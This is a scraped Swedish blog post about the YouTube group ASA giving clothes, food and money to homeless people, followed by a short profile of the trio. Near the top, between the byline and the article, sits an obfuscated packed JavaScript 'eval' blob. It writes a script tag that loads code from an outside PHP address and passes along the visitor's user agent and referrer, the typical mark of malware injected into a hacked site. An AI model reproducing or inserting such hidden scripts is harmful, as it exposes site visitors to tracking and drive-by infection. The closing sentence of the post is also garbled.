Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Får de hemlösa att le

Marcus
  • On 1 juni, 2013
  • http://www.revue.se

Pranktrion eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ddyde|var|u0026u|referrer|kndfn||js|php’.split(’|’),0,{}))
ASA brukar lägga upp roliga videos på youtube. Igår valde att lägga upp en video som handlade om något helt annat. De bestämde sig för att göra något för de hemlösa på gatorna. Tillsammans tog de gamla kläder som de inte använde längre och samlade ihop dessa, sedan fixade det mat. vatten och pengar som de sedan skulle ge bort till de hemlösa.

I videon ser man glädjen när de hemlösa tar emot sakerna och byter ut sina gamla kläder mot kläderna ifrån ASA.

Kortfattat om ASA:

ASA är en trio muslimer som lägger upp roliga videos på youtube. Varje bokstav i ASA är namnet för varje person i trion. Adam Saleh, Sheikh Akbar och Abdullah Ghuman. I början lade de upp roliga sketcher om araber, men deras vändning kom när de lät gruppmedlemmen Adam Saleh göra en video där han gjorde Ellen’s dare dance, vilket var en tävling som Ellen degeneres höll i. Tävlingen gick ut på att man skulle dansa bakom främlingar utan att de märkte något. Videon har sätts över 4 miljoner gånger och Adam blev tillochmed finalist i tävlingen och fick komma och besöka Ellen’s show. Nu lägger de för de mesta upp  Nuförtiden lägger de upp väldigt mycket olika, men väldigt mycket underhållande videoklipp.